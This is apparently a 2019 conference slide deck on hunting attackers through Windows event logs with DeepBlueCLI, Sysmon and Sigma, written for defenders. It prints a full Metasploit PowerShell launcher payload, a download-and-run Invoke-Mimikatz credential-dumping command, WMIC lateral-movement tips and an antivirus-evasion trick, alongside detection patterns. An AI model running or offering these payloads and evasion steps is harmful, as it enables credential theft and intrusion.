Threat Hunting Via Windows Event Logs Secwest 2019


Threat Hunting via Windows Event Logs

Eric Conrad (GSE #13)
@eric_conrad

Welcome!

• A copy of this talk is available at http://ericconrad.com
• Includes a link to the DeepBlueCLI GitHub site
o https://github.com/sans-blue-team/DeepBlueCLI/
o Plus sample evtx files for all major events discussed

Introducing DeepBlueCLIv2 2
Sunlight is the Best Disinfectant – Louis Brandeis

• Malware and exploit frameworks have been evolving faster than common preventive technologies have kept up
o Detective controls allow more aggressive checks
• By default Metasploit creates random service names like this:
o Service Name: GWRhKCtKcmQarQUS
o Service name matches: ^[A-Za-z]{16}$
• Blocking 16-character service names containing only upper and lower alpha characters could lead to false positives
• This is how you fight, and this is how you win:
o Automatically detect these names, married with rapid incident response

The Evolution of Windows Malware Payloads

Malware and exploit frameworks often copy an exe to the filesystem
• Often in c:\windows\system32\RanDOmNAme.exe
• Metasploit exploit target: Native upload
• Corporate malware defenses are designed to prevent this
Newer malware and exploitation frameworks are migrating to 'fileless malware', leveraging PowerShell for post-exploitation
• They avoid using .ps1 files, and load the code via (very long) command lines, or use the PowerShell WebClient.DownloadString method
• Metasploit exploit target PowerShell uses a long compressed and base64-encoded PowerShell function loaded via cmd.exe

Metasploit Meterpreter Payload via Command Line
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM
2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7m
PqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFi
mzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGj
xjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8Hp
D3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCP
P+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAy
CS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuu
r/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8Zy
NlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyW
zmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqV
KPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6
TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgf
jAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3T
bf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSd
SogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1
F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX
(New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecut
e=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnost
ics.Process]::Start($s);

Details

• Command is > 2400 bytes
• powershell.exe launched via cmd.exe
• Hidden PowerShell window
• gzip compressed and Base64 encoded PowerShell function
o To analyze: decode base64, and then decompress with gzip
o Result: obfuscated PowerShell function

Obfuscated PowerShell Function (after base64 -d and gzip -d)

Advantages to these Methods

• Antivirus will allow cmd.exe and powershell.exe to execute
• There are no files saved to the disk to scan
• If the system is using application whitelisting: cmd.exe and powershell.exe will be whitelisted
• Restricting execution of ps1 files via Set-ExecutionPolicy settings has no effect
o "Set-ExecutionPolicy is not a Security Control" - @Ben0xA, DerbyCon 2016
• There is no logging of process command lines or PowerShell commands by default
• Preventive and detective controls tend to allow and ignore these methods

Perfect is the Enemy of Good - Voltaire

• Many of the techniques used by DeepBlueCLI can be evaded
o DeepBlueCLI identifies commands containing 'mimikatz'
o Dodge by renaming 'mimikatz' to 'mimidogz'
• Dodging all of the techniques is difficult
o Long command lines
o Use of Net.WebClient
o base64-encoded functions
o Compressed functions
o Obfuscated commands draw attention
• Many IT professionals commit the perfect solution fallacy

Log Full Command Line of all Processes

• Windows 7+ now supports logging the full command line of all launched processes natively
• Turn this on!
• Run gpedit.msc and set:
o Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\Detailed Tracking
o Computer Configuration\Administrative Templates\System\Audit Process Creation
• Then monitor:
o PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}

Command Lines to Look For

Once logging full command lines: search for the following:
• Loooooooooong commands (1,000+ bytes)
• csc.exe (C# compiler)
• cvtres.exe (Resource File To COFF Object Conversion Utility)
• rundll32.exe and cscript.exe
• .vbs scripts
• schtasks and at
• Anything launched from a temp folder
• Launching PowerShell via cmd.exe
• Base64 encoded commands

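As an added example (not code from the talk or from DeepBlueCLI), the checks listed on this slide, the Metasploit service-name regex from the "Sunlight is the Best Disinfectant" slide, and the PSEXESVC.exe / WmiPrvSE.exe creator-process telltales from the PsExec and WMIC event log view slides, applied in Python to a few constructed event records. The record field names, the sample values and the rule wording are assumptions; only the Metasploit service name and the regex come from the talk.

```python
import re
from typing import Dict, List

# Constructed sample events (not real log data). The field names follow the
# Security 4688 (process creation) and System 7045 (service installed) event
# data as an assumption; only their shape matters for the checks below.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CreatorProcessName": r"C:\Windows\explorer.exe",
     # Metasploit-style launcher: cmd.exe starting a hidden PowerShell with a
     # huge inline payload (the payload text itself is just filler here)
     "CommandLine": r"C:\Windows\system32\cmd.exe /b /c start /b /min "
                    r"powershell.exe -nop -w hidden -c " + "A" * 2400},
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CreatorProcessName": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMA"},
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CreatorProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"EventID": 7045, "ServiceName": "GWRhKCtKcmQarQUS"},   # value from the talk
    {"EventID": 7045, "ServiceName": "Spooler"},
]

LONG_COMMAND_BYTES = 1000   # slide: "Loooooooooong commands (1,000+ bytes)"

# (regex, finding) pairs mirroring the list on the slide; all case-insensitive.
# The bare "at" pattern is deliberately loose and will need tuning in practice.
COMMAND_LINE_RULES = [
    (r"\bcsc\.exe\b", "csc.exe (C# compiler)"),
    (r"\bcvtres\.exe\b", "cvtres.exe (resource to COFF converter)"),
    (r"\b(rundll32|cscript)\.exe\b", "rundll32.exe / cscript.exe"),
    (r"\.vbs\b", ".vbs script"),
    (r"\b(schtasks|at)(\.exe)?\b", "scheduled task (schtasks / at)"),
    (r"\\temp\\", "launched from a temp folder"),
    (r"\bcmd\.exe\b.*\bpowershell(\.exe)?\b", "PowerShell launched via cmd.exe"),
    (r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "Base64 encoded command"),
    (r"FromBase64String\(", "inline Base64 decode (Metasploit-style payload)"),
]

# Creator processes that mean "this process was started remotely"
SUSPICIOUS_CREATORS = {
    r"c:\windows\psexesvc.exe": "launched via PsExec (creator PSEXESVC.exe)",
    r"c:\windows\system32\wbem\wmiprvse.exe": "launched via WMI (creator WmiPrvSE.exe)",
}

METASPLOIT_SERVICE_NAME = re.compile(r"^[A-Za-z]{16}$")   # regex from the talk


def check_event(event: Dict) -> List[str]:
    """Return the list of findings for one event (empty list means nothing odd)."""
    findings: List[str] = []
    if event["EventID"] == 4688:
        cmd = event.get("CommandLine", "")
        size = len(cmd.encode("utf-8"))
        if size > LONG_COMMAND_BYTES:
            findings.append(f"long command line ({size} bytes)")
        for pattern, finding in COMMAND_LINE_RULES:
            if re.search(pattern, cmd, re.IGNORECASE):
                findings.append(finding)
        creator = event.get("CreatorProcessName", "").lower()
        if creator in SUSPICIOUS_CREATORS:
            findings.append(SUSPICIOUS_CREATORS[creator])
    elif event["EventID"] == 7045:
        # Blocking such names would cause false positives; detecting them and
        # responding quickly is the approach the talk recommends.
        if METASPLOIT_SERVICE_NAME.match(event.get("ServiceName", "")):
            findings.append("16-letter random service name (Metasploit default)")
    return findings


def scan(events: List[Dict]) -> Dict[int, List[str]]:
    """Map the index of every suspicious event to its findings."""
    results: Dict[int, List[str]] = {}
    for index, event in enumerate(events):
        findings = check_event(event)
        if findings:
            results[index] = findings
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["EventID"], findings)
```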
PowerShell Logging

• PowerShell 2 (Windows 7) has very little logging capability
• PowerShell 5+ includes multiple methods for logging PowerShell activity (not enabled by default)
• Event 4103 (Module Logging) is very helpful
• PowerShell 2 can be upgraded to PowerShell 5.1 (released with the Windows 10 Anniversary Update) in one step
• Upgrade all Windows systems to PowerShell 5+

Microsoft Sysinternals Sysmon

Sysinternals Sysmon is a great free tool that monitors application use (and more)
System Monitor (Sysmon) is a Windows system service and device driver that, once installed on a system, remains resident across system reboots to monitor and log system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.1

Sysmon: Application Monitoring

Freely available from Microsoft
• Could ease introduction into some environments
Integrates cleanly into most SIEM or Windows Event Collection environments by logging to Windows Event Log: Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
Sysmon can automatically generate hashes of all (or selected) binaries that run on a system
• Allows submission to services such as VirusTotal
• Or a belt-and-suspenders detective whitelisting process…

Sysmon Capabilities

Microsoft aggressively updates Sysmon, so look for new versions/features added regularly
Key capabilities include (logging Event ID in parentheses):
• Process: Process creation (1), Driver loads (6), Image/DLL loads (7), CreateRemoteThread (8), Named Pipes (17/18)
• Registry: Key/value creation or deletion (12), modification (13)
• File: Create time modification (2), File create (11), ADS create (15)
• Network: Connection (3) with hostname, IP, port, and PID
• WMI: Event filter activity (19), consumer activity (20), consumer filter activity (21)

IMPHASH: Hash++

Sysmon can log a variety of hashes
<HashAlgorithms>*</HashAlgorithms>
• Generate all the hashes Sysmon understands: MD5, SHA1, SHA256, and… IMPHASH – Wait, what is that one???
IMPHASH (import hash), popularized by Mandiant, was designed specifically for detect/response capabilities, not just integrity
• Rather than simply taking a cryptographic hash of a file, an IMPHASH hashes an executable's function or API imports from DLLs
Because of the way a PE's import table is generated, we can use the imphash value to identify related malware samples1

Upcoming Sysmon Update

Mandiant M-Trends on Mimikatz

Mandiant reports heavy attacker use of Mimikatz:
In nearly all of our investigations, the victims’ anti-virus software failed to hinder Mimikatz, despite the tool’s wide reach and reputation. Attackers typically modified and recompiled the source code to evade detection.1
Tools like Metasploit include some Mimikatz functionality, and there are also PowerShell versions
• But the current native Mimikatz binary is typically more powerful and up to date
How difficult is compiling a custom/altered version of Mimikatz?

The Sed Persistent Threat (SPT)

Windows mimikatz binary download
• 70% AV detection rate
Compiled mimikatz binary from source (no changes)
• 31% AV detection rate
Compiled mimidogz binary from source
• s/mimikatz/mimidogz/g
• 7% AV detection rate

This Dog Can Hunt!

Whack-a-Mole

• We rescanned mimidogz a few hours later on VirusTotal, and Kaspersky suddenly detected it
• We rescanned the next morning, and 6 more vendors detected it (13 total)
• The total reached 26 vendors a week later

Announcing Mimiyakz: The Sed Persistent Threat (SPT) Strikes Again!

IMPHASH to the Rescue

Mimidogz SHA1=7E3CE3B80B77D423103AF2DC64488DA843D2CC16
Mimidogz IMPHASH=C7E2E477687C6F5E733C140990FCCFFC

Mimiyakz SHA1=B7A150ADDC518533E3894D2EDEF117EEB79B207E
Mimiyakz IMPHASH=C7E2E477687C6F5E733C140990FCCFFC
Detecting Unusual and Unsigned Drivers and Images with Sysmon

• Note the two Sysmon event logs on the right
• One is signed (by Microsoft)
• One isn't!

DeepBlueCLIv2

• DeepBlueCLI (PowerShell version) runs on PowerShell 3.0 or higher
o Can process PowerShell 4.0/5.0 event logs
o DeepWhite requires PowerShell 4+
• Processes local event logs, or evtx files
o Either feed it evtx files, or parse the live logs via Windows Event Log collection
• DeepBlueCLIv2 outputs in PowerShell objects
o May be piped to Format-List, Format-Table, Out-GridView, ConvertTo-Csv, ConvertTo-HTML, ConvertTo-json, ConvertTo-Xml, etc.
• Thanks for the help: Joshua Wright (@joswr1ght), John Strand (@strandjs), and Mick Douglas (@bettersafetynet).

Thanks, John!

Recent Updates to DeepBlueCLI

Call for EVTX files

• We are actively updating DeepBlueCLI, and are looking for EVTX files that contain evidence of malice
• If you have EVTX files you are willing to share, email me at [email protected]
• We will work to add new features to DeepBlueCLI based on submitted EVTX files

DeepBlueCLI

DeepBlueCLI detects a large number of suspicious behaviors

DeepBlueCLI Example: Password Spray

DeepBlueCLI

DeepBlueCLI contains a number of example EVTX files containing malice

DeepBlueCLI Output Options

DeepBlueCLI: Base64 and/or Compressed Commands

• DeepBlueCLI attempts to automatically detect base64-encoded commands
o And automatically decode them
• If the commands are also compressed (Metasploit-style) it will also uncompress them
• In both cases: it will then scan the normalized command for malicious regular expression matches

PowerShell Command Parsing vs. Script Parsing

• Parsing CMD and PowerShell command lines is *much* easier than parsing the scripts themselves
• DeepBlueCLI parses command lines (and other event log data), not script content
• Check out Revoke-Obfuscation from Daniel Bohannon (@danielhbohannon) and Lee Holmes' (@Lee_Holmes) awesome solution to obfuscation in scripts
o https://github.com/danielbohannon/Revoke-Obfuscation

Parsing PowerShell Event 4104

• PowerShell event 4104 (Script Block Logging) contains a ton of data
• DeepBlueCLI focuses on the PowerShell command line that launched the script block, and parses it for pattern matches and signs of obfuscation
o Thanks: @heinzarelli, @HackerHurricane, and @danielhbohannon

Case Study: Petya

In cases where the SMB exploit fails, Petya tries to spread using PsExec under local user accounts. (PsExec is a command-line tool that allows users to run processes on remote systems.) It also runs a modified mimikatz LSAdump tool that finds all available user credentials in memory.
It attempts to run the Windows Management Instrumentation Command-line (WMIC) to deploy and execute the payload on each known host with relevant credentials. (WMIC is a scripting interface that simplifies the use of Windows Management Instrumentation (WMI) and systems managed through it.)1
-Sophos

Case Study: NotPetya

• NotPetya is part of a family of malware based on the leaked (alleged) NSA hacking tools, including ETERNALBLUE
o This exploit targeted Windows Server Message Block (SMB, TCP port 445) and was patched by MS17-010 (ref. 1)
• This malware would typically enter an environment via SMB
o It would then use Mimikatz to attempt to steal credentials and move laterally through a network via Microsoft PSExec and WMIC (Windows Management Instrumentation Console)
o Automated malware is now behaving like human penetration testers
• If an organization had one unpatched system and 999 patched: all 1,000 could become compromised
o This is dependent on internal network segmentation, trust models, etc.

NotPetya Financial Cost

The release of NotPetya was an act of cyberwar by almost any definition—one that was likely more explosive than even its creators intended. Within hours of its first appearance, the worm raced beyond Ukraine and out to countless machines around the world, from hospitals in Pennsylvania to a chocolate factory in Tasmania. It crippled multinational companies including Maersk, pharmaceutical giant Merck, FedEx’s European subsidiary TNT Express, French construction company Saint-Gobain, food producer Mondelēz, and manufacturer Reckitt Benckiser. In each case, it inflicted nine-figure costs. It even spread back to Russia, striking the state oil company Rosneft.
The result was more than $10 billion in total damages…1

NotPetya Effects on Ukraine

On a national scale, NotPetya was eating Ukraine’s computers alive. It would hit at least four hospitals in Kiev alone, six power companies, two airports, more than 22 Ukrainian banks, ATMs and card payment systems in retailers and transport, and practically every federal agency. “The government was dead,” summarizes Ukrainian minister of infrastructure Volodymyr Omelyan. According to ISSP, at least 300 companies were hit, and one senior Ukrainian government official estimated that 10 percent of all computers in the country were wiped. The attack even shut down the computers used by scientists at the Chernobyl cleanup site, 60 miles north of Kiev. “It was a massive bombing of all our systems,” Omelyan says.1

NotPetya Effects on Maersk

Maersk is "world’s largest container shipping company,"1 based in Copenhagen, Denmark
• At around 9 am New Jersey time, Fernández’s phone started buzzing with a succession of screaming calls from angry cargo owners. All of them had just heard from truck drivers that their vehicles were stuck outside Maersk’s Elizabeth terminal. “People were jumping up and down,” Fernández says. “They couldn’t get their containers in and out of the gate.”
• Soon, hundreds of 18-wheelers were backed up in a line that stretched for miles outside the terminal. One employee at another company’s nearby terminal at the same New Jersey port watched the trucks collect, bumper to bumper, farther than he could see.… Police began to approach drivers in their cabs, telling them to turn their massive loads around and clear out.1

Maersk Information Security Improvements

Maersk security staffers tell WIRED that some of the corporation’s servers were, up until the attack, still running Windows 2000—an operating system so old Microsoft no longer supported it.… They called attention to Maersk’s less-than-perfect software patching, outdated operating systems, and above all insufficient network segmentation. That last vulnerability in particular, they warned, could allow malware with access to one part of the network to spread wildly beyond its initial foothold, exactly as NotPetya would the next year.
Since then… Maersk has worked not only to improve its cybersecurity but also to make it a “competitive advantage.” Indeed, in the wake of NotPetya, IT staffers say that practically every security feature they’ve asked for has been almost immediately approved. Multifactor authentication has been rolled out across the company, along with a long-delayed upgrade to Windows 10.1

Case Study: SAMSAM attack on the City of Atlanta I

For over a week, the City of Atlanta has battled a ransomware attack that has caused serious digital disruptions in five of the city's 13 local government departments. The attack has had far-reaching impacts—crippling the court system, keeping residents from paying their water bills, limiting vital communications like sewer infrastructure requests, and pushing the Atlanta Police Department to file paper reports for days. It's been a devastating barrage—all caused by a standard, but notoriously effective strain of ransomware called SamSam.
- https://www.wired.com/story/atlanta-ransomware-samsam-will-strike-again/

Case Study: SAMSAM attack on the City of Atlanta II

Unlike many ransomware variants that spread through phishing or online scams and require an individual to inadvertently run a malicious program on a PC (which can then start a chain reaction across a network), SamSam infiltrates by exploiting vulnerabilities or guessing weak passwords in a target's public-facing systems, and then uses mechanisms like the popular Mimikatz password discovery tool to start to gain control of a network
- https://www.wired.com/story/atlanta-ransomware-samsam-will-strike-again/

SAMSAM spreading via WMI and PsExec

After the threat actors establish a foothold within a network segment, they can enumerate hosts and users on the network via native Windows commands such as NET.EXE. The attackers utilize malicious PowerShell scripts to load the Mimikatz credential harvesting utility, allowing them to obtain access to privileged accounts. By moving laterally and dumping additional credentials, attackers can eventually obtain Active Directory domain administrator or highly privileged service accounts.
Given these credentials, attackers can infect domain controllers, destroy backups, and proceed to automatically target and encrypt a broader set of endpoints. The threat actors deploy and run the malware using a batch script and WMI or PsExec utilities.
- https://tanium.com/blog/samsam-ransomware-how-tanium-can-help/

Three Slides on Defensible Security Architecture

• This talk is on detection, not security architecture, so I will keep this brief
• Everyone seeing this talk should ensure their organization:
o Has patched every Windows system for MS17-010
• And deployed compensating controls (such as firewalls) for those that can't be (easily) patched
o Uses a different local administrator password on every Windows system (LAPS)
o Does not expose critical services (including Email, VPN, Remote Desktop Protocol, and others) to the Internet via single-factor authentication
• Begin limiting privilege for powerful accounts and groups, including Domain Administrators (and many others)
• For organizations with flat internal networks: begin the process of segmenting them
o Private VLANs (discussed next) are often a quick win

Defensible Secure Architecture: Private VLANs (PVLANs)

• Private VLANs are (usually) one of the easiest 'wins' an organization may achieve for making pivoting more difficult for an attacker
o 'Pivoting' describes the act of 'moving behind enemy lines,' when malware (or a person) moves from one compromised internal host to another host
o Lots of malware will attempt to pivot from one client PC to another
• Many corporate wireless solutions offer 'station isolation': a client on a wireless access point may speak to the AP (which is also a switch and a router) only
o Clients may not access other clients on the same AP
o Clients may also be prohibited from speaking to any other clients (on other APs)
• A private VLAN is the wired equivalent to wireless station isolation
o If this makes sense for wireless clients: why not wired?
• If Private VLANs are not appropriate for your environment, use the host-based firewall to achieve the same goal (blocking client<->client traffic)

Host-Based Firewall Capabilities

• Most host-based firewalls can block based on ports, IP addresses, and applications
• Do you allow the following applications to send traffic from your non-IT Windows clients?
o powershell.exe
o psexec.exe
o wmic.exe
• If so: why?

Test PowerShell Command

• The test command is the PowerSploit Invoke-Mimikatz command, typically loaded via Net.WebClient DownloadString
o IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds

PowerShell via PsExec: Event Log View

• Event is logged via security Event 4688 (and Sysmon event 1)
• Telltale sign (beyond the Command Line):
o Creator Process Name: C:\Windows\PSEXESVC.exe

WMIC Details

• Malware is increasingly using WMIC to move laterally by stealing credentials and executing remote commands via "process call create"
o This vector is often used to execute PowerShell
o Pro tip: encoding as base64 avoids issues with quotes and double quotes
• For testers: WMIC will not show command STDOUT locally (it is displayed on the remote system)
o Dodge this: save output to a remote share under attacker control
• Thanks: Ed Skoudis, Command Line Kung Fu Episode #31 (ref. 3)
o The local WMIC process has limited share access, regardless of running user
o The share should allow anonymous access1
o Fun fact: anonymous is not in the 'everyone' group

PowerShell via WMIC: Event Log View

• Event is logged via security Event 4688 (and Sysmon event 1)
• Telltale sign (beyond the Command Line):
o Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe

Use Case: DeepBlueCLI vs. PowerShell via WMIC and PsExec

DeepWhite

• DeepWhite performs detective executable whitelisting
o Parses the following Sysmon events: process creation (1), Driver loads (6), and Image/DLL loads (7)
o Can also submit a list of hashes from a CSV file
o Checks the SHA256 hash vs. a whitelist
• Whitelist creation: Get-ChildItem c:\windows\system32 -Include '*.exe','*.dll','*.sys','*.com' -Recurse|Get-FileHash|Export-Csv -Path whitelist.csv
• It auto-submits non-whitelisted hashes to VirusTotal using @darkoperator's Posh-VirusTotal (ref. 5)
o Requires a free VirusTotal personal API key (ref. 6), which is limited to 4 queries/minute
o https://www.virustotal.com/en/documentation/public-api/
• DeepWhite submits hashes every 15 seconds

mimikatz.exe: Sysmon event 1, VirusTotal report

FB55414848281F804858CE188C3DC659D129E283BD62D58D34F6E6F568FEAB37

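As an added Python example (not DeepWhite's own code) of the two ideas on the DeepWhite and IMPHASH slides: parse Sysmon's Hashes field, check each image's SHA256 against a whitelist in the shape Get-FileHash | Export-Csv writes, and group images by IMPHASH so that the mimidogz/mimiyakz pair, whose SHA1 values differ, lands in one cluster. The mimikatz.exe SHA256 and the mimidogz/mimiyakz SHA1 and IMPHASH values are the ones shown in the talk; the event field names, the other hashes and the whitelist contents are constructed. The VirusTotal submission step is left out so the block runs offline.

```python
import csv
import io
from collections import defaultdict
from typing import Dict, List, Set

# Constructed Sysmon event 1 records (assumed field names: Image, Hashes).
# Real hashes from the talk are used where the talk shows them; the rest are
# made-up placeholders.
SYSMON_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "Hashes": "SHA256=" + "11" * 32 + ",IMPHASH=" + "AA" * 16},
    {"Image": r"C:\Users\alice\Downloads\mimikatz.exe",
     "Hashes": "SHA256=FB55414848281F804858CE188C3DC659D129E283BD62D58D34F6E6F568FEAB37"
               ",IMPHASH=" + "BB" * 16},
    {"Image": r"C:\Users\alice\Downloads\mimidogz.exe",
     "Hashes": "SHA1=7E3CE3B80B77D423103AF2DC64488DA843D2CC16,SHA256=" + "22" * 32
               + ",IMPHASH=C7E2E477687C6F5E733C140990FCCFFC"},
    {"Image": r"C:\Users\alice\Downloads\mimiyakz.exe",
     "Hashes": "SHA1=B7A150ADDC518533E3894D2EDEF117EEB79B207E,SHA256=" + "33" * 32
               + ",IMPHASH=C7E2E477687C6F5E733C140990FCCFFC"},
]

# Constructed whitelist in the shape Get-FileHash | Export-Csv produces
# (a #TYPE line, then Algorithm,Hash,Path columns).
WHITELIST_CSV = """#TYPE Microsoft.PowerShell.Commands.FileHashInfo
"Algorithm","Hash","Path"
"SHA256","{notepad}","C:\\windows\\system32\\notepad.exe"
"SHA256","{calc}","C:\\windows\\system32\\calc.exe"
""".format(notepad="11" * 32, calc="44" * 32)


def parse_hashes(field: str) -> Dict[str, str]:
    """Split Sysmon's 'ALG=hex,ALG=hex' Hashes field into a dict (upper-cased)."""
    out: Dict[str, str] = {}
    for part in field.split(","):
        algorithm, _, value = part.partition("=")
        if algorithm and value:
            out[algorithm.strip().upper()] = value.strip().upper()
    return out


def load_whitelist(csv_text: str) -> Set[str]:
    """Read SHA256 values from an Export-Csv file, skipping the #TYPE header."""
    lines = [line for line in csv_text.splitlines() if not line.startswith("#TYPE")]
    reader = csv.DictReader(io.StringIO("\n".join(lines)))
    return {row["Hash"].upper() for row in reader if row["Algorithm"].upper() == "SHA256"}


def not_whitelisted(events: List[Dict], whitelist: Set[str]) -> List[Dict[str, str]]:
    """DeepWhite-style check: every image whose SHA256 is not on the whitelist."""
    hits = []
    for event in events:
        hashes = parse_hashes(event["Hashes"])
        sha256 = hashes.get("SHA256")
        if sha256 is None or sha256 not in whitelist:
            hits.append({"Image": event["Image"], "SHA256": sha256 or "(missing)",
                         "IMPHASH": hashes.get("IMPHASH", "(missing)")})
    return hits


def cluster_by_imphash(events: List[Dict]) -> Dict[str, List[str]]:
    """Group images by IMPHASH: recompiled or renamed builds keep the same
    import table, so they share it even when their cryptographic hashes differ."""
    clusters: Dict[str, List[str]] = defaultdict(list)
    for event in events:
        imphash = parse_hashes(event["Hashes"]).get("IMPHASH")
        if imphash:
            clusters[imphash].append(event["Image"])
    return dict(clusters)


if __name__ == "__main__":
    whitelist = load_whitelist(WHITELIST_CSV)
    for hit in not_whitelisted(SYSMON_EVENTS, whitelist):
        print("not whitelisted:", hit)
    for imphash, images in cluster_by_imphash(SYSMON_EVENTS).items():
        if len(images) > 1:
            print("shared IMPHASH", imphash, images)
```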
DeepWhite Details

• Here's mimikatz.exe:
• Note: it is quite common to receive 1 VirusTotal hit for benign software

VirusTotal False Positives I

• Reasons for VirusTotal false positives:
o Legitimate Microsoft software that is abused by attackers, such as PsExec downloaded directly from Microsoft Sysinternals:

VirusTotal False Positives II

• Legitimate software is also sometimes flagged
o Often because it's unsigned (yes, Microsoft still does this occasionally)
o …and scanned by an aggressive heuristic model
o …often by a new/small company

Enter Sigma

We have a lot of data, and a lot of tools to analyze the data
• Different data formats, different dashboard formats, etc.
1. Even in deployments of the same SIEM…
• Field names differ
• Data sources differ
2. We collect in different log formats:
• Windows logs – Syslog, JSON, XML
3. We have no common language to specify analytics

Sigma to the Rescue!

• Written by Florian Roth & Thomas Patzke
• "To logs, what Snort is to network traffic and YARA is to files"
• High level generic language for analytics
• Best method so far of solving the logging signature problem!
• Enables analytics re-use and sharing across orgs
• MISP compatible - share and store aligned with threat intel
• Decouples rule logic from SIEM vendor and field names
• Eliminates SIEM tribal knowledge
• Blue teams need this!!!

How Sigma Works

Conversion of Signatures to Alert Queries

[Diagram: a Sigma rule (analytics written by the community) is combined with a mapping to your field names (written by you) and converted into a search query for each company's search engine: Company 1 (Splunk), Company 2 (QRadar), Company 3 (Elasticsearch), …, or a grep command. Each search query then produces an alert.]

Rule Format

• Plain text YAML files
• Easy schema
1. Metadata
• Title, status, description, references, tags, etc.
2. Log Source
• What type, brand, and service is the log from?
3. Detection – List of Selectors
4. Condition – Logic for selector matching

Title, Metadata, and Log Source

Log source: Windows Sysmon, Sysmon EventID 8 (create remote thread)

Log Source Section

Optional Classifiers:
• category: proxy, firewall, AV, IDS
o For all logs of a group of products
• product: Squid, pfSense, Symantec, Snort, Windows
o For all log outputs of one product
• service: SSH, DNS, DHCP
o For a subset of a product's logs – sshd, named, …
• description: Additional detail on the log source, configs

Supported Outputs

• Splunk
• QRadar
• ArcSight
• Elasticsearch (Elastalert, Query strings, DSL, Watcher, & Kibana)
